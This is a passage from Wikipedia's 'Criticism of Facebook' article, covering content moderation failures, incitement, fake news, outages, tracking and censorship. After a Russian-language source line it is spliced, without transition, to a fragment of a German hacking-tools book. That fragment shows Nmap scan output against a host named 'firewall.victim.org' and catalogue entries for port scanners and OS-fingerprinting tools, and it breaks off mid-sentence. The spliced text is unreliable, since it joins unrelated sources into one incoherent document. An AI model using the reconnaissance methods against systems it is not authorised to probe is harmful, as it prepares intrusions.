Ali Hamza told BBC Arabic, "I sent links to lawyers to send to the ICC in the Hague against Khalifa Haftar and his military commanders regarding the massacres of civilians", said Hamza. In the video, the LNA soldiers label the civilians as terrorists. Human rights lawyer and war crimes specialist Rodney Dixon QC reviewed the evidence BBC Arabic found. "If groups are using those platforms to propagate their campaigns then those platforms should seriously look at their role because they could then be assisting in that process of further crimes being committed", he said.[citation needed] After presenting our findings to Facebook they removed all the videos that show a suspected war crime taking place. However, they opted not to suspend any of the accounts which we found linked to the images. Erin Saltman, Facebook's policy manager for counterterrorism in Europe, Middle East and Africa, told BBC Arabic, "Sometimes there are very conflicting narratives of whether or not the victim is a terrorist, or whether it's a civilian over who's committing that act, we cannot be the pure arbiters of truth."[195] But Facebook and YouTube's own community guidelines explicitly prohibit content that promotes or depicts acts of violence.[198]

Facebook Live[edit]

Facebook Live, introduced in August 2015 for celebrities[199] and gradually rolled out for regular users starting in January 2016,[200][201] lets users broadcast live videos, with Facebook's intention for the feature to be presenting public events or private celebrations.[202] However, the feature has been used to record multiple crimes, deaths, and violent incidents, causing significant media attention.[203][204][205][206][207][208][209][210]

Facebook has received criticism for not removing videos faster,[211] and Facebook Live has been described as a "monster [Facebook] cannot tame"[212] and "a gruesome crime scene for murders".[213] In response, CEO Mark Zuckerberg announced in May 2017 that the company would hire 3,000 people to review content and invest in tools to remove videos faster.[214][215][216]

Pro-anorexia groups[edit]

In 2008, Facebook was criticized for hosting groups dedicated to promoting anorexia. The groups promoted dramatic weight loss programs, shared extreme diet tips, and posted pictures of emaciated girls under "Thinspiration" headlines. Members reported having switched to Facebook from Myspace, another social networking service, due to a perceived higher level of safety and intimacy at Facebook.[217] In a statement to BBC News, a Facebook spokesperson stated that "Many Facebook groups relate to controversial topics; this alone is not a reason to disable a group. In cases where content is reported and found to violate the site's terms of use, Facebook will remove it."[218]

Pro-mafia groups' case[edit]

In Italy in 2009, the discovery of pro-mafia groups, one of them claiming Bernardo Provenzano's sainthood, caused an alert in the country[219][220][221] and brought the government to rapidly issue a law that would force Internet service providers to deny access to entire websites in case of refused removal of illegal contents. The amendment was passed by the Italian Senate and now needs to be passed unchanged by the Chamber of Deputies to become effective.[222][223][224]

Facebook criticized the government's efforts, telling Bloomberg that it "would be like closing an entire railway network just because of offensive graffiti at one station", and that "Facebook would always remove any content promoting violence and already had a takedown procedure in place."[225]

Trolling[edit]

On March 31, 2010, The Today Show ran a segment detailing the deaths of three separate adolescent girls and trolls' subsequent reactions to their deaths. Shortly after the suicide of high school student Alexis Pilkington, anonymous posters began trolling for reactions across various message boards, referring to Pilkington as a "suicidal CUSS", and posting graphic images on her Facebook memorial page. The segment also included an exposé of a 2006 accident, in which an eighteen-year-old student out for a drive fatally crashed her father's car into a highway pylon; trolls emailed her grieving family the leaked pictures of her mutilated corpse.[226]

There have been cases where Facebook "trolls" were jailed for their communications on Facebook, particularly memorial pages. In Autumn 2010, Colm Coss of Ardwick, Britain, was sentenced to 26 weeks in jail under s127 of the Communications Act 2003 of Great Britain,[227] for "malicious communications" for leaving messages deemed obscene and hurtful on Facebook memorial pages.[228][229]

In April 2011, Bradley Paul Hampson was sentenced to three years in jail after pleading guilty to two counts of using a carriage service (the Internet) to cause offense, for posts on Facebook memorial pages, and one count each of distributing and possessing child pornography when he posted images on the memorial pages of the deceased with phalluses superimposed alongside phrases such as "Woot I'm dead".[230][231]

Rape pages[edit]

A series of pro-rape and 'rape joke' content on Facebook drew attention from the media and women's groups.[232] Rape Is No Joke (RINJ), a group opposing the pages, argued that removing "pro-rape" pages from Facebook and other social media was not a violation of free speech in the context of Article 19 of the Universal Declaration of Human Rights and the concepts recognized in international human rights law in the International Covenant on Civil and Political Rights.[233] RINJ repeatedly challenged Facebook to remove the rape pages.[234] RINJ then turned to advertisers on Facebook telling them not to let their advertising be posted on Facebook's 'rape pages'.[235]

Following a campaign that involved the participation of Women, Action and the Media, the Everyday Sexism Project and the activist Soraya Chemaly, who were among 100 advocacy groups, Facebook agreed to update its policy on hate speech. The campaign highlighted content that promoted domestic and sexual violence against women, and used over 57,000 tweets and more than 4,900 emails to create outcomes such as the withdrawal of advertising from Facebook by 15 companies, including Nissan UK, House of Burlesque and Nationwide UK. The social media website initially responded by stating that "While it may be vulgar and offensive, distasteful content on its own does not violate our policies",[236] but then agreed to take action on May 29, 2013, after it had "become clear that our systems to identify and remove hate speech have failed to work as effectively as we would like, particularly around issues of gender-based hate".[237]

Child abuse images[edit]

In June 2015, the UK National Society for the Prevention of Cruelty to Children raised concerns about Facebook's apparent refusal when asked to remove controversial video material which allegedly showed a baby in emotional distress.[238]

In March 2017, BBC News reported in an investigation that Facebook only removed 18 of the 100 groups and posts it had reported for containing child exploitation images. The BBC had been granted an interview with Facebook policy director Simon Milner under the condition that they provide evidence of the activity. However, when presented with the images, Facebook canceled the interview, and told the BBC that it had been reported to the National Crime Agency for illegally distributing child exploitation images (the NCA could not confirm whether the BBC was actually being investigated).[239] Milner later stated to the BBC that the investigation had exposed flaws in its image moderation process that have since been addressed, and that all of the reported content was removed from the service.[240]

According to data from the National Center for Missing & Exploited Children in 2020, there have been 20 million reported incidents of child sexual abuse material on Facebook. This accounted for 95% of total incidents recorded by the organization, while Google accounted for half a million incidents, Snapchat for 150,000 and Twitter for 65,000.[241]

Objectification of women[edit]

In July 2017, GMA News reported that "a number" of secret Facebook groups that had been engaging in illegal activity of sharing "obscene" photos of women had been exposed, with the Philippine National Bureau of Investigation warning group members of the possibility of being liable for violating child pornography and anti-voyeurism laws. Facebook stated that it would remove the groups as violations of its community guidelines.[242] A few days later, GMA News had an interview with one of the female victims targeted by one of the groups, who stated that she received friend requests from strangers and inappropriate messages. After reporting to authorities, the Philippine National Police's anti-cybercrime unit promised to take action in finding the accounts responsible.[243] Senator Risa Hontiveros responded to the incidents with the proposal of a law that would impose "stiff penalties" on such group members, stating that "These people have no right to enjoy our internet freedom only to abuse our women and children. We will not allow them to shame our young women, suppress their right to express themselves through social media and contribute to a culture of misogyny and hate".[244]

Anti-Semitism[edit]

Facebook has been suspected of having a double standard when it comes to pages and posts regarding the Arab–Israeli conflict. When it comes to alleged incitement, Facebook has been accused of being unfair, removing only posts and pages that attack Palestinians, while turning a blind eye to similar posts that are violently antisemitic. The NGO Shurat Hadin-Israel Law Center conducted an experiment over the incitement issue, which sought to expose what it viewed as double standards regarding anti-Israel sentiment vis-a-vis the simultaneous launch of two Facebook pages: "Stop Palestinians" and "Stop Israel". Following the launch of the two nearly identical pages, the NGO posted hateful content simultaneously on both pages. Next, Shurat Hadin reported both faux-incitement pages to Facebook to see which, if either, would be removed. According to them, despite featuring nearly identical content, only one was removed from the online platform. They said the page inciting against Palestinians was closed by Facebook (on the same day that it was reported) for "containing credible threat of violence" which "violated our [Facebook's] community standards", but not the page inciting against Israelis. Shurat Hadin said that Facebook claimed that this page was "not in violation of Facebook's rules". Shurat Hadin's staged anti-Israel group "Stop Israel" still remains active on Facebook.[245] ProPublica stated in September 2017 that a website was able to target ads at Facebook users who were interested in "how to burn Jew" and "Jew hater". Facebook removed the categories and said it would try to stop them from appearing to potential advertisers.[246]

In March 2019, Facebook subsidiary Instagram declined to remove an anti-semitic image posted by right-wing conspiracy theorist Alex Jones, saying that it did not violate their community standards.[247][better source needed]

Incitement of violence against Israelis[edit]

Facebook has been accused of being a public platform that is used to incite violence. In October 2015, 20,000 Israelis claimed that Facebook was ignoring Palestinian incitement on its platform and filed a class-action suit demanding that Facebook remove all posts "containing incitement to murder Jews".[248]

Israeli politicians have complained that Facebook does not comply or assist with requests from the police for tracking and reporting individuals when they share their intent to kill or commit any other act of violence on their Facebook pages. In June 2016, following the murder of Hallel Ariel, 13, by a terrorist who posted on Facebook, Israeli Minister of Public SecurityGilad Erdan charged that "Facebook, which has brought a positive revolution to the world, has become a monster ... The dialogue, the incitement, the lies of the young Palestinian generation are happening on the Facebook platform." Erdan accused Facebook of "sabotaging the work of Israeli police" and "refusing to cooperate" when Israel police turns to the site for assistance. It also "sets a very high bar" for removing inciting content.[249]

In July 2016, a civil action for $1 billion in damages was filed in the United States District Court for the Southern District of New York on behalf of the victims and family members of four Israeli-Americans and one US citizen killed by Hamas militants since June 2014.[250][251] The victims and plaintiffs in the case are the families of Yaakov Naftali Fraenkel, a 16-year-old who was kidnapped and murdered by Hamas operatives in 2014; Taylor Force, a 29-year-old American MBA student and US Army veteran killed in a stabbing spree in Jaffa in 2016; Chaya Braun, a three-month-old thrown from her stroller and slammed into the pavement when a Hamas attacker drove his car into a light rail station in Jerusalem in an October 2014; 76-year-old Richard Lakin who was killed in the October 2015 shooting and stabbing attack on a Jerusalem bus; and Menachem Mendel Rivkin, who was seriously wounded in a January 2016 stabbing attack in Jerusalem.[251] The plaintiffs claimed that Facebook knowingly provided its social media platform and communication services to Hamas in violation of provisions of US Anti-Terrorism laws which prohibits US businesses from providing any material support, including services, to designated terrorist groups and their leaders. The government of the United States has designated Hamas as a "Foreign Terrorist Organization" as defined by US law. The suit claims that Hamas "used and relied on Facebook's online social network platform and communications services to facilitate and carry out its terrorist activity, including the terrorist attacks in which Hamas murdered and injured the victims and their families in this case".[250][251] The legal claim was rejected; the court found that Facebook and other social media companies are not considered to be the publishers of material users post when digital tools used by the company match content with what the tool identifies as interested consumers.[252][253]

In August 2016, Israel's security service, the Shin Bet, reported that it had arrested nine Palestinians who had been recruited by the Lebanon-based Hezbollah terrorist organization. Operatives of Hezbollah in Lebanon and Gaza Strip recruited residents of the West Bank, Gaza and Israel through Facebook and other social media sites. After recruiting cell leaders on Facebook, Hezbollah and the recruits used encrypted communications to avoid detection, and the leaders continued to recruit other members. The terror cells received Hezbollah funding and planned to conduct suicide bombings and ambushes and had begun preparing explosive devices for attacks, said the security service, which claimed credit for preventing the attacks. The Shin Bet said it also detected multiple attempts by Hezbollah to recruit Israeli Arabs through a Facebook profile.[254][255][256]

Currently, legislation is being prepared in Israel, allowing fines of 300,000 shekels for Facebook and other social media like Twitter and YouTube for every post inciting or praising terrorism that is not removed within 48 hours, and could possibly lead to further acts of terrorism.[257]

Countermeasure efforts[edit]

In June 2017, Facebook published a blog post, offering insights into how it detects and combats terrorism content. The company claimed that the majority of the terrorism accounts that are found are discovered by Facebook itself, while it reviews reports of terrorism content "urgently", and, in cases of imminent harm, "promptly inform authorities". It also develops new tools to aid in its efforts, including the use of artificial intelligence to match terrorist images and videos, detecting when content is shared across related accounts, and developing technologies to stop repeat offenders. The company stated that it has 150 people dedicated to terrorism countermeasures, and works with governments and industries in an effort to curb terrorist propaganda. Its blog post stated that "We want Facebook to be a hostile place for terrorists."[258][259]

Employee data leak[edit]

In June 2017, The Guardian reported that a software bug had exposed the personal details of 1,000 Facebook workers involved in reviewing and removing terrorism content, by displaying their profiles in the "Activity" logs of Facebook groups related to terrorism efforts,. In Facebook's Dublin, Ireland headquarters, six individuals were determined to be "high priority" victims of the error, after the company concluded that their profiles were likely viewed by potential terrorists in groups such as ISIS, Hezbollah and the Kurdistan Workers' Party. The bug itself, discovered in November 2016 and fixed two weeks later, was active for one month, and had also been retroactively exposing censored personal accounts from August 2016. One affected worker had fled Ireland, gone into hiding, and only returned to Ireland after five months due to a lack of money. Suffering from psychological distress, he filed a legal claim against Facebook and CPL Resources, an outsourcing company, seeking compensation. A Facebook spokesperson stated that "Our investigation found that only a small fraction of the names were likely viewed, and we never had evidence of any threat to the people impacted or their families as a result of this matter", and Craig D'Souza, Facebook's head of global investigations, said: "Keep in mind that when the person sees your name on the list, it was in their activity log, which contains a lot of information ... there is a good chance that they associate you with another admin of the group or a hacker". Facebook offered to install a home-alarm monitoring system, provide transport to and from work, and counseling through its employee assistance program. As a result of the data leak, Facebook is reportedly testing the use of alternative, administrative accounts for workers reviewing content, rather than requiring workers to sign in with their personal profiles.[260][261]

Fake news[edit]

Main article: Fake news website

Facebook has been criticized for not doing enough to limit the spread of fake news stories on their site, especially after the 2016 United States presidential election, which some[Like whom?] have claimed Donald Trump would not have won if Facebook had not helped spread what they claim to have been fake stories that were biased in his favor.[262] Mark Zuckerberg has begun to take steps to eliminate the prevalence of fake news on Facebook as a result of criticisms of Facebook's influence on the presidential election.[263] At a conference called Techonomy Mark Zuckerberg stated in regards to Donald Trump, "There's a profound lack of empathy in asserting that the only reason why someone could have voted the way that they did is because they saw some fake news". Zuckerberg affirms the idea that people do not stray from their own ideals and political leanings. He stated, "I don't know what to do about that" and, "When we started, the north star for us was: We're building a safe community".[264]

Zuckerberg has also been quoted in his own Facebook post, "Of all the content on Facebook, more than 99 percent of what people see is authentic".[265] In addition, The Pew Research Center, stated that "62% of Americans obtain some, or all, of their news on social media-the bulk of it from Facebook".[266] The former editor at Facebook leaked inflammatory information about the websites' algorithm's pointing to certain falsehoods and bias by the news created within Facebook. Although Facebook initially denied claims of issues with fake new stories and their algorithms, they fired the entire trending team involved with a fake news story about Megyn Kelly being a "closeted liberal".[267]

Incitement of violence in Sri Lanka[edit]

Sri Lankan telecommunications minister Harin Fernando stated that Facebook had been too slow removing content and banning users who were using its platforms to facilitate violence during the 2018 anti-Muslim riots in Sri Lanka.[268][269] Facebook stated that it is increasing the number of Sinhalese-speakers it employs to review content.[268]

Uyghur genocide denial[edit]

In February 2021, a Press Gazette investigation found that Facebook had accepted promotional content from Chinese state media outlets such as China Daily and China Global Television Network that spread disinformation denying the Uyghur genocide.[270]

Myanmar abuses[edit]

See also: Rohingya genocide § Facebook

The chairman of the U.N. Independent International Fact-Finding Mission on Myanmar said Facebook played a "determining role" in the Rohingya genocide.[271] Facebook has been criticized for enabling Islamophobic content targeting the Rohingya people to spread.[272] The United Nations Human Rights Council has called the platform "a useful instrument for those seeking to spread hate".[273]

In response, Facebook removed accounts owned by the Myanmar Armed Forces for inciting hatred against the Rohingya people,[274][275][276] and "engaging in coordinated inauthentic behavior."[277]

Blue tick[edit]

Facebook grants blue tick to verified accounts of public personalities, brands, and celebrities (including politicians and artists). They have no policy in the cases where an individual who has a verified blue tick account is convicted in a serious criminal case. There has been a recent case in India where a politician was convicted and sentenced to 10 years in jail in a serious bribery criminal case but his Facebook page still continues to be verified.[278]

Neo-Nazi and white supremacist content[edit]

From c.2018 until March 27, 2019, Facebook's internal policy was to permit "white nationalist" content but not "white supremacist" content, despite advice stating there is no distinction.[279] In practice, it hosted much white supremacist and neo-Nazi content.[280] On March 27, 2019, Facebook backtracked and stated that white nationalism "cannot be meaningfully separated from white supremacy and organized hate groups".[279]

In 2020 the Centre for Countering Digital Hate (CCDH) found Facebook was hosting a white supremacist network with more than 80,000 followers and links to the UK far right. The CCDH said: "Facebook's leadership endangered public safety by letting neo-Nazis finance their activities through Facebook and Instagram ... . Facebook was first told about this problem two years ago and failed to act."[281]

COVID-19 and anti-vaccination content[edit]

In 2021, the Bureau of Investigative Journalism found 430 Facebook pages – being followed by 45 million people – were spreading false information about COVID-19 or vaccinations.[282] This was despite a promise by Facebook in 2020 that no user or company should directly profit from false information about immunisation against COVID-19.[283] A Facebook spokesman said the company had "removed a small number of the pages shared with us for violating our policies".

Marketplace illegal Amazon rainforest sales[edit]

In February 2021 BBC investigations revealed Amazon rainforest plots on land reserved for indigenous people were being illegally traded on Facebook Marketplace with the sellers admitting they do not have the land title. The BBC reported Facebook's response is that they were ""ready to work with local authorities" however unwilling to take independent action.[284]

Technical[edit]

Real-name policy controversy and compromise[edit]

Main article: Facebook real-name policy controversy

Facebook has a real-name system policy for user profiles. The real-name policy stems from the position "that way, you always know who you're connecting with. This helps keep our community safe."[16] The real-name system does not allow adopted names or pseudonyms,[285] and in its enforcement has suspended accounts of legitimate users, until the user provides identification indicating the name.[286] Facebook representatives have described these incidents as very rare.[286] A user claimed responsibility via the anonymousAndroid and iOS app Secret for reporting "fake names" which caused user profiles to be suspended, specifically targeting the stage names of drag queens.[287] On October 1, 2014, Chris Cox, Chief Product Officer at Facebook, offered an apology: "In the two weeks since the real-name policy issues surfaced, we've had the chance to hear from many of you in these communities and understand the policy more clearly as you experience it. We've also come to understand how painful this has been. We owe you a better service and a better experience using Facebook, and we're going to fix the way this policy gets handled so everyone affected here can go back to using Facebook as you were."[288]

On December 15, 2015, Facebook announced in a press release[289] that it would be providing a compromise to its real name policy after protests from groups such as the gay/lesbian community and abuse-victims.[290] The site is developing a protocol that will allow members to provide specifics as to their "special circumstance" or "unique situation" with a request to use pseudonyms, subject to verification of their true identities. At that time, this was already being tested in the U.S. Product manager Todd Gage and vice president of global operations Justin Osofsky also promised a new method for reducing the number of members who must go through ID verification while ensuring the safety of others on Facebook. The fake name reporting procedure will also be modified, forcing anyone who makes such an allegation to provide specifics that would be investigated and giving the accused individual time to dispute the allegation.[291]

Deleting users' statuses[edit]

There have been complaints of user statuses being mistakenly or intentionally deleted for alleged violations of Facebook's posting guidelines. Especially for non-English speaking writers, Facebook does not have a proper support system to genuinely read the content and make decisions. Sometimes the content of a status did not have any "abusive" or defaming language, but it nevertheless got deleted on the basis that it had been secretly reported by a group of people as "offensive". For other languages than English, Facebook till now is not able to identify the group approach that is used to vilify humanitarian activism. In another incident, Facebook had to apologize after it deleted a free speech group's post about the abuse of human rights in Syria. In that case, a spokesman for Facebook said the post was "mistakenly" removed by a member of its moderation team, which receives a high volume of take-down requests.[292]

Enabling of harassment[edit]

Facebook instituted a policy by which it is now self-policed by the community of Facebook users.[when?] Some users have complained that this policy allows Facebook to empower abusive users to harass them by allowing them to submit reports on even benign comments and photos as being "offensive" or "in violation of Facebook Rights and Responsibilities" and that enough of these reports result in the user who is being harassed in this way getting their account blocked for a predetermined number of days or weeks, or even deactivated entirely.[293]

Facebook UK policy director Simon Milner told Wired magazine that "Once the piece of content has been seen, assessed and deemed OK, (Facebook) will ignore further reports about it."[294]

Lack of customer support[edit]

Like almost all other Web 2.0 sites, Facebook lacks any form of live customer support beyond "community" support pages and FAQ's which offer only general troubleshooting advice, often making it impossible to resolve issues that require the services of an administrator or are not covered in the FAQs. The automated emailing system used when filling out a support form often users back to the help center or to pages that are outdated and cannot be accessed, leaving users at a dead end with no further support available. A person who lost access to Facebook or does not have an account has no easy way to contact the company directly.

Downtime and outages[edit]

Facebook has had a number of outages and downtime large enough to draw some media attention. A 2007 outage resulted in a security hole that enabled some users to read other users' personal mail.[295] In 2008, the site was inaccessible for about a day, from many locations in many countries.[296] In spite of these occurrences, a report issued by Pingdom found that Facebook had less downtime in 2008 than most social-networking websites.[297] On September 16, 2009, Facebook started having major problems loading as people signed in. This was due to a group of hackers deliberately trying to drown out a political speaker who had social networking problems from continuously speaking against the Iranian election results. Just two days later, on September 18, Facebook went down again.[298]

In October 2009, an unspecified number of Facebook users were unable to access their accounts for over three weeks.[299][300][301][302]

On Monday, October 4, 2021, Facebook and its other apps - Instagram, Whatsapp, Messenger, Oculus, as well as the lesser-known Mapillary - had an hours-long DNS-related global outage.[303][304][305] The outage also affected anyone using "Log in with Facebook" to access third-party sites.[306] The downtime lasted approximately five hours and fifteen minutes, from approximately 15:50 UTC to 21:05 UTC, and affected roughly three billion users.[307] The outage was caused by a BGP withdrawal of all of the IP routes to their Domain Name (DNS) servers, which were all self-hosted at the time.[308][309]

Main article: 2021 Facebook outage

Tracking cookies[edit]

Facebook has been criticized heavily for 'tracking' users, even when logged out of the site. Australian technologist Nik Cubrilovic discovered that when a user logs out of Facebook, the cookies from that login are still kept in the browser, allowing Facebook to track users on websites that include "social widgets" distributed by the social network. Facebook has denied the claims, saying they have 'no interest' in tracking users or their activity. They also promised after the discovery of the cookies that they would remove them, saying they will no longer have them on the site. A group of users in the United States have sued Facebook for breaching privacy laws.[310]

As of December 2015, to comply with a court order citing violations of the European UnionDirective on Privacy and Electronic Communications—which requires users to consent to tracking and storage of data by websites, Facebook no longer allows users in Belgium to view any content on the service, even public pages, without being registered and logged in.[311]

Email address change[edit]

In June 2012, Facebook removed all existing email addresses from user profiles, and added a new @facebook.com email address. Facebook claimed this was part of adding a "new setting that gives people the choice to decide which addresses they want to show on their timelines". However, this setting was redundant to the existing "Only Me" privacy setting which was already available to hide addresses from timelines. Users complained the change was unnecessary, they did not want an @facebook.com email address, and they did not receive adequate notification their profiles had been changed.[312] The change in email address was synchronized to phones due to a software bug, causing existing email addresses details to be deleted.[313] The facebook.com email service was retired in February 2014.[314]

Safety Check bug[edit]

On March 27, 2016, following a bombing in Lahore, Pakistan, Facebook activated its "Safety Check" feature, which allows people to let friends and loved ones know they are okay following a crisis or natural disaster, to people who were never in danger, or even close to the Pakistan explosion. Some users as far as the US, UK and Egypt received notifications asking if they were okay.[315][316]

End-to-end encryption[edit]

In February 2021, the National Crime Agency of the UK expressed its concerns that the installation of end-to-end encryption methods would result in the spread of child pornography going undetected.[317][318][319] Facebook representatives had previously told a UK Parliament committee that the use of these stronger encryption methods would render it easier for pedophiles to share child pornography on Facebook's networks.[317][320] The US-based National Center for Missing and Exploited Children estimates that around 70% of reports to law enforcement regarding the spread of child pornography on Facebook would be lost as a result of the implementation of end-to-end encryption.[320]

In May 2021, Facebook came under fire from Ken McCallum, the Director-General of MI5, for its plans to introduce end-to-end encryption into its Messenger and Instagram services.[317][321] McCallum stated that the introduction of such encryption methods would prevent security organizations from viewing communications related to ongoing terrorist plots and that the implementation of end-to-end encryption would block active counter-terrorism investigations.[317][321][322]

Censorship[edit]

Main article: Censorship by Facebook

Third-party responses to Facebook[edit]

Government censorship[edit]

Main article: Censorship of Facebook

Several countries have banned access to Facebook, including Syria,[323] China,[324] and Iran.[325] In 2010, the Office of the Data Protection Supervisor, a branch of the government of the Isle of Man, received so many complaints about Facebook that they deemed it necessary to provide a "Facebook Guidance" booklet (available online as a PDF file), which cited (amongst other things) Facebook policies and guidelines and included an elusive Facebook telephone number. This number when called, however, proved to provide no telephone support for Facebook users, and only played back a recorded message advising callers to review Facebook's online help information.[326]

In 2010, Facebook reportedly allowed an objectionable page, deemed by the Islamic Lawyers Forum (ILF), to be anti-Muslim. The ILF filed a petition with Pakistan's Lahore High Court. On May 18, 2010, Justice Ijaz Ahmad Chaudhry ordered Pakistan's Telecommunication Authority to block access to Facebook until May 31. The offensive page had provoked street demonstrations in Muslim countries due to visual depictions of Prophet Mohammed, which are regarded as blasphemous by Muslims.[327][328] A spokesman said Pakistan Telecommunication Authority would move to implement the ban once the order has been issued by the Ministry of Information and Technology. "We will implement the order as soon as we get the instructions", Khurram Mehran told AFP. "We have already blocked the URL link and issued instruction to Internet service providers yesterday", he added. Rai Bashir told AFP that "We moved the petition in the wake of widespread resentment in the Muslim community against the Facebook contents". The petition called on the government of Pakistan to lodge a strong protest with the owners of Facebook, he added. Bashir said a PTA official told the judge his organization had blocked the page, but the court ordered a total ban on the site. People demonstrated outside court in the eastern city of Lahore, Pakistan, carrying banners condemning Facebook. Protests in Pakistan on a larger scale took place after the ban and widespread news of that objectionable page. The ban was lifted on May 31 after Facebook reportedly assured the Lahore High Court that it would remedy the issues in dispute.[329][330][331]

In 2011, a court in Pakistan was petitioned to place a permanent ban on Facebook for hosting a page called "2nd Annual Draw Muhammad Day May 20th 2011".[332][333]

Organizations blocking access[edit]

Ontario government employees, Federal public servants, MPPs, and cabinet ministers were blocked from access to Facebook on government computers in May 2007.[334] When the employees tried to access Facebook, a warning message "The Internet website that you have requested has been deemed unacceptable for use for government business purposes". This warning also appears when employees try to access YouTube, MySpace, gambling or pornographic websites.[335] However, innovative employees have found ways around such protocols, and many claim to use the site for political or work-related purposes.[336]

A number of local governments including those in the UK[337] and Finland[338] imposed restrictions on the use of Facebook in the workplace due to the technical strain incurred. Other government-related agencies, such as the US Marine Corps have imposed similar restrictions.[339] A number of hospitals in Finland have also restricted Facebook use citing privacy concerns.[340][341]

Schools blocking access[edit]

The University of New Mexico (UNM) in October 2005 blocked access to Facebook from UNM campus computers and networks, citing unsolicited emails and a similar site called UNM Facebook.[342] After a UNM user signed into Facebook from off campus, a message from Facebook said, "We are working with the UNM administration to lift the block and have explained that it was instituted based on erroneous information, but they have not yet committed to restore your access." UNM, in a message to students who tried to access the site from the UNM network, wrote, "This site is temporarily unavailable while UNM and the site owners work out procedural issues. The site is in violation of UNM's Acceptable Computer Use Policy for abusing computing resources (e.g., spamming, trademark infringement, etc.). The site forces use of UNM credentials (e.g., NetID or email address) for non-UNM business." However, after Facebook created an encrypted login and displayed a precautionary message not to use university passwords for access, UNM unblocked access the following spring semester.[343]

The Columbus Dispatch reported on June 22, 2006, that Kent State University's athletic director had planned to ban the use of Facebook by athletes and gave them until August 1 to delete their accounts.[344] On July 5, 2006, the Daily Kent Stater reported that the director reversed the decision after reviewing the privacy settings of Facebook. As long as they followed the university's policies of online conduct, they could keep their profiles.[345]

Closed social networks[edit]

Several web sites concerned with social networking, such as Salesforce have criticized the lack of information that users get when they share data. Advanced users cannot limit the amount of information anyone can access in their profiles, but Facebook promotes the sharing of personal information for marketing purposes, leading to the promotion of the service using personal data from users who are not fully aware of this. Facebook exposes personal data, without supporting open standards for data interchange.[346] According to several communities[347] and authors[348] closed social networking, on the other hand, promotes data retrieval from other people while not exposing one's personal information.

Openbook was established in early 2010 both as a parody of Facebook and a critique of its changing privacy management protocols.[349]

Litigation[edit]

Further information: Lawsuits involving Facebook

Terms of use controversy[edit]

Источник: https://en.wikipedia.org/wiki/Criticism_of_Facebook
_sslv2: server still supports SSLv2 3128/tcp open http-proxy Squid webproxy 2.6.STABLE18 MAC Address: 00:02:B3:8E:03:8A (Intel) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: firewall Running: IPCop Linux 2.4.X OS details: IPCop firewall 1.4.10 – 1.4.21 (Linux 2.4.31 – 2.4.36) Network Distance: 1 hop Service Info: OS: Linux HOP RTT ADDRESS 1 0.48 ms firewall.victim.org (213.172.16.20) OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.92 seconds [email protected]:~#

Bild 3.1: Nmap beim Scannen eines Rechners

48

Kapitel 3 – An den Toren rütteln: Portscanner & Co.

3.2

Lanspy

Anbieter

http://lantricks.com

Preis

-

Betriebssystem(e)

Win2003, WinXP, Win Vista, Win 7

Sprachen

Englisch

Kategorie(n)

Portscanner

Größe

< 2 MB

Usability



Oberfläche Installation

Ja

GUI

x

CMD

Schnittstellen

Know-how



Lanspy ist ein leistungsfähiger und schneller IP-Scanner, der sowohl zur Analyse des eigenen Netzwerks als auch externer Netwerke eingesetzt werden kann. Die Scan-Ergebnisse werden in sehr übersichtlicher Form präsentiert.

Bild 3.2: Übersichtliches Scanresultat des eigenen Heimnetzwerks

3.3 AW Security Portscanner

3.3

49

AW Security Portscanner

Anbieter

www.atelierweb.com

Preis

Trial, ab $ 33,95

Betriebssystem(e)

Windows XP, Win Vista, Win 7

Sprachen

Englisch

Kategorie(n)

Portscanner

Größe

< 2 KB

Usability



Oberfläche Installation

ja Know-how

GUI

x

CMD

Schnittstellen 

Neben ordentlichen Analysewerkzeugen für das lokale Netz (Anzeige von Ports, Routings, IP-Protokollen, Registryeinstellungen fürs Netzwerk, Freigaben, User, Services etc.) verfügt der Scanner auch über ein weitreichendes Angriffsrepertoire, womit er sich in der Mitte zwischen einfachen Portscannern (Superscan) und komplexen SecurityScannern (GFI, OpenVAS, Nessus oder X-Scan) bewegt.

Bild 3.3: Der AW Security Portscanner ist für Angriffs- und Verteidigungszwecke gleich gut geeignet

50

Kapitel 3 – An den Toren rütteln: Portscanner & Co.

3.4

Winfingerprint

Anbieter

http://winfingerprint.com

Preis

-

Betriebssystem(e)

Win2000, WinXP, Win2003, Win NT 4.0

Sprachen

Englisch

Kategorie(n)

Fingerprinting Tool

Oberfläche

Größe

< 2 MB

Ja

Usability



Installation

Know-how

GUI

Schnittstellen

x

CMD

WinPCap



Nach Eingabe einer IP-Liste, einer IP-Range, des Hosts oder der Netzwerkumgebung scannt das Programm andere ans Netz angeschlossene Rechner und gibt – je nach Voreinstellung – einen ausführlichen Report über das Zielsystem, der auch gespeichert werden kann.

Bild 3.4: Beim Abdruck sammeln

3.5 Xprobe2

3.5

51

Xprobe2

Anbieter / Entwickler

http://xprobe.sourceforge.net

Preis

-

Betriebssystem(e)

Linux/UNIX, Solaris, FreeBSD, OpenBSD, NetBSD, IRIX

Sprachen

Englisch

Kategorie(n)

OS Fingerprinting Tool

Oberfläche

Größe

< 2 MB

Nein / Ja

Usability



Installation / Kompilation

GUI

CMD x

Schnittstellen

Know-how



Xprobe2 beherrscht aktives Fingerprinting, mit dem das auf dem Zielhost eingesetzte Betriebssystem erkannt werden kann. Dabei kombiniert Xprobe2 verschiedene Methoden unter Benutzung des ICMP-Protokolls von einer errechneten Wahrscheinlichkeit bis hin zur Einbindung einer Signaturdatenbank. Eine neue Version namens XprobeNG (auch als Xprobe2++ bekannt) ist für den Sommer des Jahres 2010 angekündigt. Eine Abfrage, angesetzt auf den geöffneten Port UDP/161 von victim.org •

-p (specify portnumber, protocol and state)

bringt folgendes Ergebnis:

